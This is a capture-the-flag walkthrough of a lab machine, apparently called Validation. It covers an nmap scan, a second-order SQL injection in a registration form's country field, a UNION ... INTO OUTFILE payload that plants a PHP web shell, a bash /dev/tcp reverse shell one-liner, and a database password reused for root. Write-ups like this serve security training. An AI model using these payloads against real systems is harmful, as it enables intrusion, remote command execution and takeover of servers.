As always, we start with nmap to discover open ports/services.
Nmap scan
namp -sC -sV -oA validation 10.10.11.116
Nmap scan report for 10.10.11.116
Host is up (0.18s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d8:f5:ef:d2:d3:f9:8d:ad:c6:cf:24:85:94:26:ef:7a (RSA)
| 256 46:3d:6b:cb:a8:19:eb:6a:d0:68:86:94:86:73:e1:72 (ECDSA)
|_ 256 70:32:d7:e3:77:c1:4a:cf:47:2a:de:e5:08:7a:f8:7a (ED25519) 80/tcp open http Apache httpd 2.4.48
|_http-server-header: Apache/2.4.48 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8). 5000/tcp filtered upnp
5001/tcp filtered commplex-link
5002/tcp filtered rfe
5003/tcp filtered filemaker
5004/tcp filtered avt-profile-1
8080/tcp open http nginx
|_http-title: 502 Bad Gateway
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We have 3 ports open:
22 => SSH
80 => HTTP
8080 => HTTP
HTTP Enumeration
Port 8080 gives 502 Bad Gateway so lets enumerate port 80
Going to http://10.10.11.116 we have a registration form.
Putting some data and click submit.
It seems like it’s saving our inputs into the database and then fetching them and displaying them on the page. OR it is just displaying them without using a database.
I tried injecting a single quote in the username field but nothing happened, then i intercepted the request and injected a single quote in the country parameter and i got this error.
Making the connection sleep for 10 seconds Andorra' UNION SELECT sleep(10); -- -
And follow redirection, it worked successfully.
I guess we have a second order SQL injection vulnerability, because the sleep occurs when fetching (displaying) the data on the page, and doesn’t occur when submitting the data at first.
That means that the user input is sanitized correctly, but the problem is when the web application fetches the data from the database it doesn’t validate it.
Initial Foothold
Now that we have a SQLi, lets try to drop a shell on the box. Andorra' UNION SELECT '<?php SYSTEM($_GET["c"]) ?>' INTO OUTFILE '/var/www/html/shell.php' -- -
We get an error but when we try to visit shell.php it’s created successfully.
Now lets specify the c parameter to execute id command.
You can use any reverse shell you want, i like using this one bash -c 'bash -i >& /dev/tcp/<ip>/<port> 0>&1'
Getting root
There is config file that contains mysql credentials.
uhc:uhc-9qual-global-pw
Tried this password with root and we are now root!